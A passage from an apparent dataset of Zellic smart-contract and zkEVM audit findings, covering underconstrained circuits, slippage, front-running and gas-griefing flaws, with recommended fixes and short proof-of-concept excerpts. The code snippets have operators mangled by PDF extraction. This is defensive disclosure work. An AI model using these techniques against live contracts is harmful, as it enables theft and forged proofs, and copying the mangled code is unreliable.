reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> IVault(vault).withdraw(shares) \u2013 What is controllable? shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> IERC20Upgradeable(asset()).balanceOf(address(this)) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used to limit the maximum withdrawal. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (asset is considered trusted). rootFunction -> IERC20Upgradeable(asset()).safeTransfer(receiver, assets ) \u2013 What is controllable? receiver and assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Zellic Beefy Finance Reverts bubble up; reentrancy is not possible (asset is considered trusted). Zellic Beefy Finance 5 Assessment Results At the time of our assessment, the reviewed code was deployed to the Ethereum Mainnet. During our assessment on the scoped Beefy Wrapper contracts, we discovered two findings, all of which were informational in nature. Beefy Finance acknowledged all findings and implemented fixes.", + "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Borrower cannot withdraw funds", + "labels": [ + "Zellic" + ], + "body": "Target: OpenTermLoan Category: Business Logic Likelihood: Low Severity: High : High In certain situations where the price drops below the maintenance collateral ratio, the borrower is unable to withdraw the principal and activate the loan. function withdraw () public onlyBorrower { require(loanState =) FUNDED, \"Invalid loan state\"); /) Enforce the maintenance collateral ratio, if applicable _enforceMaintenanceRatio(); loanState = ACTIVE; /) Send principal tokens to the borrower _withdrawPrincipalTokens(_effectiveLoanAmount, borrower); /) Emit the event emit OnBorrowerWithdrawal(_effectiveLoanAmount); } The borrower is not able to withdraw their funds. The only way for the borrower to regain access to their funds is for the lender to call the loan and return the funds. Remove _enforceMaintenanceRatio in withdraw. Zellic Fractal Fractal has addressed the issue by implementing a fix in commit 4888d6b6 which removes the _enforceMaintenanceRatio call in withdraw. Zellic Fractal", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf" + }, + { + "title": "3.2 Initialize function can be called multiple times", + "labels": [ + "Zellic" + ], + "body": "Target: GlpSpotMarginAccount Category: Business Logic Likelihood: Low Severity: Medium : Medium The initialize function can be called multiple times. function initializeSubAccount( address loanAddress, address feeCollectorAddress, address paraswapAddress, address tokenTransferProxyAddress, uint256 feeAmount) public onlyOperator { } /) @audit shouldn't be callable more than once. _loanContract = loanAddress; _feeCollector = feeCollectorAddress; _paraswap = paraswapAddress; _tokenTransferProxy = tokenTransferProxyAddress; _feeBips = feeAmount; This can lead to unexpected behavior, since the state variable changes will break the logic of the contract. The impact of this finding is diminished by the restriction that only the operator has the authority to invoke this function. We recommend adding a check to ensure that the function is not called more than once, such as using OpenZeppelin\u2019s initializer modifier. Fractal has addressed the issue by implementing a fix in commit d463725e through the use of the initializer modifier. The function has also been renamed to initialize Zellic Fractal to match the naming convention of the other contracts. Zellic Fractal", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf" + }, + { + "title": "3.3 Insufficient slippage protection", + "labels": [ + "Zellic" + ], + "body": "Target: Project Wide Category: Business Logic Likelihood: Medium Severity: Medium : Medium The codebase has several areas where slippage checks are either absent or insufficient to guard against MEV attacks. Some of these areas are listed below. All instances of depositCurveConvex in the various strategies: function depositCurveConvex( uint256 amount, uint256[3] calldata amounts, uint256 slippageBips, address proxyVault) public onlyOperator { ...)) uint256 calcAmount = ICurveSwap(FRAXZAPPOOL).calc_token_amount(ALUSDFRAXPOOL, amounts, true); uint256 minAmount = (calcAmount * (BIPS_DIVISOR - slippageBips)) / BIPS_DIVISOR; ICurveSwap(FRAXZAPPOOL).add_liquidity(ALUSDFRAXPOOL, amounts, minAmount); } In this instance, minimum amounts are calculated from on-chain prices that will have already been skewed; therefore, the add_liquidity operation will always pass. All instances of withdrawCurveConvex in the various strategies: function withdrawCurveConvex( bytes32 kek_id, address proxyVault, uint256 slippageBips) public onlyOperator { Zellic Fractal ...)) uint256 calcAmount = ICurveSwap(FRAXZAPPOOL).calc_withdraw_one_coin(ALUSDFRAXPOOL, lpTokenBalance, 2); uint256 minAmount = (calcAmount * (BIPS_DIVISOR - slippageBips)) / BIPS_DIVISOR; ICurveSwap(FRAXZAPPOOL).remove_liquidity_one_coin(ALUSDFRAXPOOL, lpTokenBalance, 2, minAmount); ...)) } In this instance, minimum amounts are calculated from on-chain prices that will have already been skewed; therefore, the remove_liquidity_one_coin operation will always pass. This also applies to addLiquidityAndDeposit and removeLiquidityAndWithdraw in Fract- StableSwap. The same issue is present for the minUsdcAmount function in GlpUnwind. Then there are slippage issues in borrow pools where the manipulation of borrow pools can result in less than expected tokens. In the Aave strategies, these exchanges are protected by a min amount number. However, in the Compound strategies, there is no minimum check for borrowed tokens received. function mintAndBorrow( address mintAddress, address borrowAddress, uint256 mintAmount, uint256 collateralFactorBips ) public onlyOperator { } require(mintAddress !) address(0), \"0 Address\"); require(borrowAddress !) address(0), \"0 Address\"); require(mintAmount > 0, \"Mint failed\"); require(collateralFactorBips <) BIPS_DIVISOR, \"Collateral factor\"); _mint(mintAddress, mintAmount); _borrow(borrowAddress, collateralFactorBips); Zellic Fractal In FractAaveConvexFraxUsdc, the interface for the CRVFRAXPOOL is incorrect and a timestamp is supplied instead of a min amount. ICurveSwap(CRVFRAXPOOL).add_liquidity(amounts, block.timestamp + 10); /)@audit timestamp supplied for min amount In FractMoonwellStrategy.sol, in the harvestByMarket function, both swaps pass a 0 for the min amount out. function harvestByMarket(address mintAddress, address borrowAddress) public onlyOperator { ...)) _swapTokens(MOONWELL_TOKEN, underlyingAddress, rewardBalance, 0); /)@audit pass a 0 for min amount out _swapNativeToken(underlyingAddress, movrBalance, 0); /)@audit pass a 0 for min amount out } Insufficient slippage protection can result in the loss of funds of users. Our recommendation is to incorporate minimum amount arguments obtained from off-chain sources and verify that the slippage is within acceptable limits. Fractal has addressed the issue by implementing fixes in commit 5da58e4c8 by the addition of a minimum amount parameter in every impacted function. Zellic Fractal", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf" + }, + { + "title": "3.4 State variables are shadowed by function parameters", + "labels": [ + "Zellic" + ], + "body": "Target: FractCompoundStrategy, SwapContractManager Severity: Low Category: Coding Mistakes : Low Likelihood: Low Two state variables are shadowed by function parameters. This applies for counterPa rtyRegistry in SwapContractManager and comptroller in FractCompoundStrategy. constructor( address feeCollectorAddr, address counterPartyRegistryAddr ){ } require(feeCollectorAddr !) address(0), '0 address'); require(counterPartyRegistryAddr !) address(0), '0 address'); feeCollector = feeCollectorAddr; counterPartyRegistry = counterPartyRegistryAddr; function deployTotalReturnSwapContract( uint8 direction, address operator, address counterPartyRegistry, /) ...)) This can lead to unexpected behavior, since the state variables will be shadowed by the function parameters. We recommend opting for a different name for the function parameters, or removing the state variables. Zellic Fractal Fractal has addressed the issue by implementing a fix in commit 66ef7c87f and dc471fdd by removing and/or renaming the local variables. Zellic Fractal", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol v2- Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing test suite code coverage", + "labels": [ + "Zellic" + ], + "body": "Target: MultiRateLimited Severity: Low : Informational Category: Code Maturity Likelihood: n/a Some functions in the smart contract are not covered by any unit or integration tests, to the best of our knowledge. We ran both the Hardhat test suite and the Forge tests. The following functions do not have test coverage: MultiRateLimited.sol: getLastBufferUsedTime These functions are extremely simple, so we do not see this as a significant issue. We reviewed all untested functions with increased scrutiny. Fortunately, we did not find any additional vulnerabilities. Other than these minor flaws, the code base otherwise has nearly 100% code cov- erage as of the time of writing. We applaud Volt Protocol for their commitment to thorough testing. Because correctness is so critically important when developing smart contracts, we recommend that all projects strive for 100% code coverage. Testing should be an essential part of the software development lifecycle. No matter how simple a function may be, untested code is always prone to bugs. Expand the test suite so that all functions and their branches are covered by unit or integration tests. The issue has been acknowledged by Volt Protocol, and a fix is pending. Zellic Volt Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Time functions rely on an unverified external date library", + "labels": [ + "Zellic" + ], + "body": "Target: ScalingPriceOracle Severity: n/a : Informational Category: Business Logic Likelihood: n/a The ScalingPriceOracle is designed so that new CPI data from the chainlink oracle can be requested once a month: at least 28 days between requests, and only on the 15th day of the month or later. To calculate the current day, the contract uses block.timestamp and the popular BokkyPooBah\u2019s DateTime Library. This library con- tains an algorithm to convert from Unix timestamp days since epoch to the current calendar date. int256 __days = int256(_days); int256 L = __days + 68569 + OFFSET19700101; int256 N = (4 * L) / 146097; L = L - (146097 * N + 3) / 4; int256 _year = (4000 * (L + 1)) / 1461001; L = L - (1461 * _year) / 4 + 31; int256 _month = (80 * L) / 2447; int256 _day = L - (2447 * _month) / 80; L = _month / 11; _month = _month + 2 - 12 * L; _year = 100 * (N - 49) + _year + L; Since this code is crucial to the functionality of the contract, and its design is not clearly documented, we considered the risk of a possible bug in this dependency. A bug in the dependency could cause the ScalingPriceOracle to malfunction or lock up. This is mitigated by the fact that the ScalingPriceOracle is kept behind a proxy )OraclePassThrough), but we still wanted to verify the correctness of this function. To do so, we compared the results of the BokkyPooBah algorithm with a known ground truth )Python\u2019s datetime library). We computed values with both methods for all timestamp values +/- 30 years from the current date, and found that the results were all correct. We also formally verified the correctness of the algorithm against musl libc\u2019s gmtime function by using an SMT solver. Zellic Volt Protocol In the future, continue to carefully verify the correctness of external dependencies when adding them to the code base. There have been several well-known security incidents caused by external dependencies in the past. No remediation is necessary, as we successfully verified the dependencies are correct. Zellic Volt Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Some functions can be implemented more efficiently", + "labels": [ + "Zellic" + ], + "body": "Target: Deviation Severity: Low : Informational Category: Gas Optimization Likelihood: n/a The function calculateDeviationThresholdBasisPoints calculates an absolute differ- ence of two numbers. It computes the absolute value of both the numerator and denominator separately, which is less efficient than computing the absolute value of the overall result. function calculateDeviationThresholdBasisPoints(int256 a, int256 b) public pure returns (uint256) { } ///)) delta can only be positive uint256 delta = ((a < b) ? (b - a) : (a - b)).toUint256(); return (delta * Constants.BASIS_POINTS_GRANULARITY) / (a < 0 ? a * -1 : a).toUint256(); The code can be refactored to compute the absolute value of the quotient at the end, rather than computing the quotient of two absolute values. This would eliminate a ternary expression. Volt Protocol acknowledged and optimized the code based on our suggestions. Zellic Volt Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Volt Protocol - Zellic Audit Report.pdf" + }, + { + "title": "1.1 Poseidon Hash\u2019s outputs are taken from capacity", + "labels": [ + "Zellic" + ], + "body": "Target: Poseidon Circuit, src/hash.rs Category: Cryptography Likelihood: N/A Severity: Informational : N/A Sponge-based hash functions are based on (disregarding padding for brevity) A state of t = r + c field elements A permutation \u03c0 on Ft p To hash the input, the state is initialized to zero and the input is first divided into chunks of r elements. Then the inputs are repeatedly fed into the first r elements of the state, then a permutation is applied. This continues until the input is fully incorporated. Then, until the output is fully retrieved, the first r elements of the state are taken out, applying the permutation if the output is not full yet. The However, in this implementation of Poseidon, which uses t = 3, r = 2, c = 1 with the output being a single field element, takes the said output from the capacity, i.e. the last c = 1 element, rather than from the rate, i.e. the first r elements. The construction of the hash does not match the definition of the sponge-based hash construction. Therefore, the implemented Poseidon hash function may not directly benefit from the previous cryptanalysis of Poseidon and other sponge-based hash functions. More research on the security of the Poseidon hash when the outputs are taken from the capacity, as well as research on how other projects have implemented the Posei- don hash should be conducted. We note that the permutation used for the sponge is up to specification. This issue has been acknowledged by Scroll. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.2 mpt_only being true leads to overconstrained circuits", + "labels": [ + "Zellic" + ], + "body": "Target: Poseidon Circuit, src/hash.rs Category: Overconstrained Circuits Likelihood: Low Severity: High : High Descripton The Poseidon table supports two modes of hashing - a MPT mode for hashing two field elements, and a Variable Length mode for hashing arbitrary length inputs. The SpongeChip gets mpt_only as an struct element, which denotes whether the chip will be purely used for MPT purposes. Depending on whether mpt_only is true, the custom rows padded at the beginning of the table changes. If it\u2019s true, there is only one custom row filled with zeroes. If not, there are two rows, with one additional row representing a hash of an empty message. However, due to incorrect ordering of logic, the custom gate is enabled in not only offset 0, but also offset 1. config.s_custom.enable(region, 1)?; if self.mpt_only { return Ok(1); } This means that the selector is incorrectly enabled on offset 1. The fact that a certain row is a custom row is represented with a selector, and it is constrained that a custom row should have 0 as the hash inputs and control value. meta.create_gate(\u201dcustom row\u201d, |meta| { let s_enable = meta.query_selector(s_custom); vec![ s_enable.clone() * meta.query_advice(hash_inp[0], Rotation:)cur()), s_enable.clone() * meta.query_advice(hash_inp[1], Rotation:)cur()), s_enable * meta.query_advice(control, Rotation:)cur()), ] Scroll }); In the case where mpt_only is true, the values of hash_inp[0], hash_inp[1] in offset 1 are the first two field elements that are used for hashing. Since these two values are overconstrained to be equal to 0, any hashing attempt with the two input values not equaling 0 will fail the ZKP verification. However, we did not find an instance where mpt_only is true in our current audit scope. A proof of concept can be done by using the tests in hash.rs, but using the chip con- struction with mpt_only set to true. Change the order of the two logic, as follows. if self.mpt_only { return Ok(1); } config.s_custom.enable(region, 1)?; This issue has been acknowledged by Scroll, and a fix was implemented in commit 912f5ed2. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.3 padding_shift is underconstrained in the bytecode circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Bytecode Circuit, zkevm-circuits/src/bytecode_circuit/to_poseidon_h ash.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical Descripton To apply the Poseidon hash to the bytecode, a circuit is required to put together 31 bytes into a field element take two field elements and put it into a Poseidon width For the first part, the constraint system is set roughly as follows. If it is the 31st byte or the very last byte, it is a \u201cfield border\u201d The field_input column accumulates the bytes into a field element, i.e. field_i nput = byte * padding_shift if is_field_border_prev else field_input_prev + byte * padding_shift The padding_shift is the powers of 256, i.e. if not is_field_border_prev padd ing_shift :) padding_shift_prev / 256 If it is the 31st byte, the padding_shift = 1 The last constraint is not enough, as we also need to constrain padding_shift = 1 also when it is the very last byte, or at least have some way to constrain padding_shift for the last chunk of the bytecode, which might not be exactly 31 bytes. This vulnerability can be verified by modifying assign_extended_row and unroll_to_h ash_input so that the padding_shift values for the last chunk of the bytecode is mod- ified. let bytes_in_field_index_inv_f = F:)from((BYTES_IN_FIELD - bytes_in_field_index) as u64) .invert() .unwrap_or(F:)zero()); let mut padding_shift_f = F:)from(256 as u64) .pow_vartime([(BYTES_IN_FIELD - bytes_in_field_index) as u64]); let vuln = F:)from(13371337 as u64); if code_index / 31 =) code_length / 31 { padding_shift_f = padding_shift_f * vuln; } Scroll let vuln = F:)from(13371337 as u64); let (msgs, _) = code .chain(std:)iter:)repeat(0)) .take(fl_cnt * BYTES_IN_FIELD) .fold((Vec:)new(), Vec:)new()), |(mut msgs, mut cache), bt| { cache.push(bt); if cache.len() =) BYTES_IN_FIELD { let mut buf: [u8; 64] = [0; 64]; U256:)from_big_endian(&cache).to_little_endian(&mut buf[0.)32]); let ret = F:)from_bytes_wide(&buf); if msgs.len() =) fl_cnt - 1 { msgs.push(ret * vuln); } else { msgs.push(F:)from_bytes_wide(&buf)); } cache.clear(); } (msgs, cache) }); As of now, the padding_shift for the very last byte is not constrained at all, unless the length of the bytecode is a multiple of 31. By setting padding_shift for the last byte appropriately, the last field element for the Poseidon hash can be set to any field element. For example, this may lead to two different bytecodes hashing to the same field element. We recommend to add a constraint to the padding_shift for the last chunk of the bytecode. We note that constraining padding_shift = 1 when it is the field border leads to dif- ferent field values being mapped for the final chunk of the bytecode than the current implementation. For example, the final chunk of 0x01 will map to 1, rather than the current implementation\u2019s value of pow(256, 30). Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit e8aecb68. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.4 Missing range checks in MulAdd chip", + "labels": [ + "Zellic" + ], + "body": "Target: MulAdd Chip, gadgets/src/mul_add.rs Category: Underconstrained Cir- Severity: Critical : High cuits Likelihood: High The MulAdd chip checks the following relation: a * b + c =) d (mod 2^256). To per- form this calculation, the chip has to break up each number into smaller pieces (limbs) which vary in size from 64-bit to 128-bit. There are also auxillary elements in the chip used for carry where each limb is constrained to be 8-bit in size. As the field-element size in Halo2 is 254 bit, each of these limbs must have additional range checks to ensure that these limbs are properly constructed. Currently, there are no range checks on any of the individual elements used in the MulAdd chip. Following is a list of elements used by the circuits and the appropriate ranges checks that need to be performed: a_limb0 - a_limb3: [0, 264) b_limb0 - b_limb3: [0, 264) c_lo, c_hi: [0, 2128) d_lo, d_hi: [0, 2128) carry_lo0 - carry_lo8: [0, 28) carry_hi0 - carry_hi8: [0, 28) By allowing values beyond the intended range into these elements, one can pass the constraints used in the MulAdd chip with incorrect values. As an example, one of the constraints checked in the chip is: t0 = a0 \u00b7 b0 t1 = a0b1 + a1b0 t0 + t1264 + clo = dlo + carrylo2128 Without the proper range checks on carry_lo, one can generate a fake proof for any values of a, b, c and d by calculate and assigning the appropriate value to the limbs of carry_lo. Scroll We recommend using the RangeCheckGadget to constrain the elements used in the chip to their expected values as mentioned above. This issue has been acknowledged by Scroll, and a fix was implemented in commit b20bed27. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.5 Incorrect calculation of overflow value in MulAdd chip.", + "labels": [ + "Zellic" + ], + "body": "Target: MulAdd Chip, gadgets/src/mul_add.rs Category: Coding Mistakes Likelihood: Low Severity: Low : Low The MulAdd chip has an additional output which calculates if there was any overflow in the calculation of a * b + c: overflow = carry_hi_expr.clone() + a_limbs[1].clone() * b_limbs[3].clone() + a_limbs[2].clone() * b_limbs[2].clone() + a_limbs[3].clone() * b_limbs[2].clone() + a_limbs[2].clone() * b_limbs[3].clone() + a_limbs[3].clone() * b_limbs[2].clone() + a_limbs[3].clone() * b_limbs[3].clone(); The actual formula to calculate this value is (a1b3 + a2b2 + a3b1) + (a2b3 + a3b2) \u2217 264 + (a3b3) \u2217 2128 In the implementation, the third term is written as a3 \u2217 b2 when it should be a3 \u2217 b1 Within the zkevm circuits, the overflow parameter is only used in exp_circuit.rs as a parity check mul gadget. There, the overflow is tested to be either zero or non-zero. As the mistake in the implementation only affects the correctness of the value of the overflow, there is no security impact. In the future, if the exact value of the overflow is used as part of another circuit, this may cause correctness issues. To fix the mistake the implementation of overflow calculation. This issue has been acknowledged by Scroll, and a fix was implemented in commit d5ca004b. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.6 ExpCircuit has a under-constrained exponentiation algo- rithm", + "labels": [ + "Zellic" + ], + "body": "Target: ExpCircuit, zkevm-circuits/src/exp-circuit.rs Category: Underconstrained Cir- Severity: Critical : High cuits Likelihood: High The ExpCircuit is used to calculate and check the results of the EXP opcode from the EVM. Using the variables from the implementation, the following formula is checked: base*)exponent =) exponentiation (mod 2*)256) The circuit calculates the result using the exponentiation by squaring method. A pseudo- code of the algorithm is as follows: # MulAdd(a, b, c) = a * b + c = d if is_odd(exponent): constrain: MulAdd(2, exponent/)2, 1) =) exponent' result' = result * base else: constrain: MulAdd(2, exponent, 0) =) exponent result' = result * result When the parity check on the exponent is odd, there are no checks to ensure that the previous exponent was even. However, this is not an security issue as it only effects the efficiency of the algorithm but not the correctness. For the case when the exponent is even, there are no constraint checks on the first argument to the MulAdd chip to ensure that a = 2. With a specific assignment of wit- ness values, a malicious prover can prove the calculation of a incorrect exponentiation from the circuit. An example of a malicious witness assignment for the ExpTable can be seen below: Scroll base exp res p_a p_b p_c p_d m_a m_b m_d The column exp denotes the running exponent value and the column res represents the running value of exponentiation. Here, we can see that an attacker can incorrectly calculate the result that 5^12 =) 15 625 due to the under-constrained circuits. We recommend adding a constraint to check that the first argument to the parity check MulAdd gadget is 2 when the parity is even (c = 0). This issue has been acknowledged by Scroll, and a fix was implemented in commit 9b46ddbf. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.7 Bytecode Tag should be constrained to a boolean in Bytecod eCircuit", + "labels": [ + "Zellic" + ], + "body": "Target: Bytecode Circuit, zkevm-circuits/src/circuits.rs Severity: Low Category: Underconstrained Cir- : Low cuits Likelihood: Low The tag value in the BytecodeTable is used to determine whether a byte is a header (t ag = 0) or code (tag = 1). This tag is used in selectors such as is_header and is_byte to enable or disable certain constraints. These selectors make use of boolean expressions such as and:)expr, or:)expr and n ot:)expr applied on the tag column and other selector columns. These expressions have the invariant that the inputs to these must be either 0 or 1. If that is not the case, it can lead to unintended results. The is_header selector is calculated as not(tag): let is_header = |meta: &mut VirtualCells| { not:)expr(meta.query_advice(bytecode_table.tag, Rotation:)cur())) }; pub mod not { ///)) Returns an expression that represents the NOT of the given expression. pub fn expr)(b: E) -> Expression { 1.expr() - b.expr() } } In the normal usecase, is_header is true/non-zero when tag = 0. However, if the value of tag is 2, then is_header is also non-zero and it acts as true. Another unintended result happens when these selectors are multiplied with actual witness values as in the case of lookups: meta.lookup_any( \u201dpush_data_size_table_lookup(cur.value, cur.push_data_size)\u201d, |meta| { Scroll let enable = and:)expr(vec![ /) ...)) is_byte(meta), ]); /) ...)) for i in 0.)PUSH_TABLE_WIDTH { constraints.push(( enable.clone() * meta.query_advice(lookup_columns[i], Rotation:)cur()), meta.query_fixed(push_table[i], Rotation:)cur()), )) } }, ); The is_byte expression directly uses the value of the tag, so we can control the value of enable to be arbitrary. This allows us to assign any value we want to the first column of the lookup query, which will allow us to bypass the lookup check. In the case of the bytecode circuit, we were unable to find any particular way to make invalid bytecode pass the constraints because of the large number of constraints on each row. As a proactive measure, we recommend using the require_boolean constraint to en- sure that the value of bytecode_table.tag is 0 or 1, as it violates the invariants expected by the boolean expressions used in the selectors. This issue has been acknowledged by Scroll, and a fix was implemented in commit 267865d3. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.8 Redundant boolean constraint in Batched IsZero", + "labels": [ + "Zellic" + ], + "body": "Target: BatchedIsZeroChip, gadgets/src/batched_is_zero.rs Category: Overconstrained Circuits Likelihood: N/A Severity: Informational : N/A The BatchedIsZero chip takes in as input a list of values and a nonempty_witness and sets the is_zero to be 1 if all the input values are zero, and 0 otherwise. Currently, there is a constraint that checks that the value of is_zero is a boolean, i.e it is 0 or 1. We show that it is not necessary to have this constraint as it is implicitly checked by the other two constraints in the chip. 1. is_zero is 0 if there is any non-zero value: This constraint multiplies is_z If there is any ero with all the values, and ensures that all the results are 0. non-zero value, then is_zero must be 0, or else this constraint will fail. 2. is_zero is 1 if values are all zero: This constraint calculates (1 - is_zer o) * PROD(1 - value * nonzero_witness). We know from the previous con- straint that if there are any non-zero values, then is_zero must be equal to 0. This means that all the values are 0, and the terms in the product evaluate to 1. Therefore, the only possible value for is_zero which satisfies the constraint is 1. This shows that the value of is_zero can only be 0/1 based on the two constraints mentioned above. We suggest removing this redundant constraint to reduce the total number of con- straints, but we also understand if you would like to keep this constraint to maintain the clarity of the circuit implementation. This issue has been acknowledged by Scroll. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "1.9 Redundant boolean constraint in Exponentiation Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: ExpCircuit, zkevm-circuits/src/exp-circuit.rs Category: Overconstrained Circuits Likelihood: N/A Severity: Informational : N/A There is a constraint in the ExpCircuit which ensures that the columns is_step is al- ways boolean. /) is_step is boolean. cb.require_boolean( \u201dis_step is boolean\u201d, meta.query_fixed(exp_table.is_step, Rotation:)cur()), ); is_step is a Fixed Column whose values cannot be changed during witness synthesis and proving. Thus, this constraint is redundant and can be removed. We recommend removing this prover time constraint and instead adding a assert to ensure that the correct values are assigned to the is_step column during circuit com- pilation. This issue has been acknowledged by Scroll. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 1 - Audit Report.pdf" + }, + { + "title": "3.1 Wallet creation is vulnerable to front-running attacks", + "labels": [ + "Zellic" + ], + "body": "Target: creator Category: Business Logic Likelihood: Medium Severity: High : High The deployment of momentum safes is deterministic. This means that calls to init_w allet_creation(\u2026) can be front-run and safe deployment can be blocked. The call to init_wallet_creation(\u2026) passes control to init_wallet_creation_interna l(\u2026), public(friend) fun init_wallet_creation_internal( s: &signer, owners: vector
, threshold: u8, init_balance: u64, payload: vector, signature: vector, module_address: address, ) acquires PendingMultiSigCreations, MultiSigCreationEvent { let public_keys = get_public_keys(&owners); let pending = borrow_global_mut(THIS); let (msafe_address, nonce) = derive_new_multisig_auth_key( pending, signer:)address_of(s), public_keys, threshold ); /) Create the momentum safe wallet and send the initial fund for gas fee. aptos_account:)create_account(msafe_address); \u2026 \u2026 \u2026 \u2026 } which calls aptos_account:)create_account(msafe_address); on the deterministic ad- Zellic Momentum Safe dress generated from the call to derive_new_multisig_auth_key(pending, signer:)a ddress_of(s), public_keys, threshold). We created two unit tests to demonstrate this issue. For one, test_frontrun_no calls init_wallet_creation normally and passes if the call does not abort. However, test_ frontrun calculates msafe_address and registers an account at that address, passing if the call to init_wallet_creation aborts. An excerpt of the PoC is below: function test_frontrun() { ...)) let msafe_address = utils:)address_from_bytes(utils:)derive_multisig_auth_key(pubkeys, threshold, 0)); /) This causes the call to creator:)init_wallet_creation_internal to fail aptos_account:)create_account(msafe_address); creator:)init_wallet_creation( owner0, owner_addresses, threshold, init_balance, test_data.wallet_creation_payload, init_creation_sig, ); ...)) } We have provided the full PoC to Momentum Safe for reproduction and verification. A malicious user can monitor the mempool for pending init_wallet_creations(\u2026) transactions and block them by submitting transactions with a higher gas price that call aptos_account:)create_account(msafe_address). This is possible because the ad- dress msafe_address is directly readable from the mempool. An attacker could target specific users or groups of users, or eventually take on the entire protocol. Zellic Momentum Safe Alter the design of the msafe to use nondeterministic addresses. Alternatively, if the address already exists ensure that it is a multisignature account corresponding with the set of owners and multisignature threshold of the wallet being created. In commit a5517d01 Momentum Safe has implemented the following fix: /) Create the momentum safe wallet and send the initial fund for gas fee. if (!account:)exists_at(msafe_address)) { aptos_account:)create_account(msafe_address); }; assert!(account:)get_sequence_number(msafe_address) =) 0, ESEQUENCE_NUMBER_MUST_ZERO); If there is no aptos account at the msafe_address a new aptos account will be cre- ated. However, more importantly for the case of front running, if an aptos account has already been deployed than the call to init_wallet_creation will not fail. This is a suitable fix because the msafe_address has been generated based on the rules of Aptos native multisignature framework. This ensures that only the true owners of the multisignature, as they are passed in as function arguments to init_wallet_creat ion, are in control of the msafe_address. Zellic Momentum Safe", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Momentum safe deployment is vulnerable to max_gas at- tacks", + "labels": [ + "Zellic" + ], + "body": "Target: creator Category: Business Logic Likelihood: Medium Severity: High : Medium When momentum safes are deployed using momentum_safe:)register(\u2026), the mo- mentum safe metadata is retrieved using a call to creator:)get_creation(\u2026), as shown below: public entry fun register( msafe: &signer, metadata: vector ) { \u2026 \u2026 let (owners, public_keys, nonce, threshold) = creator:)get_creation(msafe_address); create_momentum(msafe, owners, public_keys, nonce, threshold, metadata); } The call to get_creation(\u2026) leads to an internal call to simple_map:)borrow(&pending. creations, &msafe_address);: public fun get_creation( msafe_address: address ): ( vector
, vector), u64, u8 ) acquires PendingMultiSigCreations { \u2026 \u2026 let creation = simple_map:)borrow(&pending.creations, &msafe_address); Zellic Momentum Safe } The underlying pending data structure can be stuffed with pending safes by any user who 1) calls registry:)register(\u2026) and 2) repeatedly calls creator:)init_wallet_cr eation with unique owners and threshold: public(friend) fun init_wallet_creation_internal( s: &signer, owners: vector
, threshold: u8, init_balance: u64, payload: vector, signature: vector, module_address: address, \u2026 \u2026 \u2026 ) acquires PendingMultiSigCreations, MultiSigCreationEvent { let (msafe_address, nonce) = derive_new_multisig_auth_key( pending, signer:)address_of(s), public_keys, threshold ); simple_map:)add(&mut pending.creations, msafe_address, new_creation); } This creates an opportunity for max_gas attacks because simple_map:)borrow(\u2026); uses a binary search algorithm, which is O(sqrt(N)). Use a hash map for storing pending safe creations in the PendingMultiSigCreations struct. Momentum Safe has addressed the griefing attack vector by replacing aptos:)simpl e_map with aptos:)table in commit 18c8bbf5. Zellic Momentum Safe", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Transactions can be blocked from max_gas attacks", + "labels": [ + "Zellic" + ], + "body": "Target: momentum_safe Category: Business Logic Likelihood: Medium Severity: High : Medium Before transactions can be submitted for execution, all momentum safe owners must make calls to momentum_safe:)submit_signature(\u2026). This retrieves the pending trans- action information through a call to a simple_map: public entry fun submit_signature( msafe_address: address, pk_index: u64, tx_hash: vector, signature: vector ) acquires Momentum, MomentumSafeEvent { \u2026 \u2026 let tx = simple_map:)borrow_mut(&mut momentum.txn_book.pendings, &tx_hash); } The underlying pendings data structure can be stuffed with pending safes by a mali- cious member of the momentum safe who repeatedly calls momentum_safe:)init_tra nsaction(\u2026): public entry fun init_transaction( msafe_address: address, 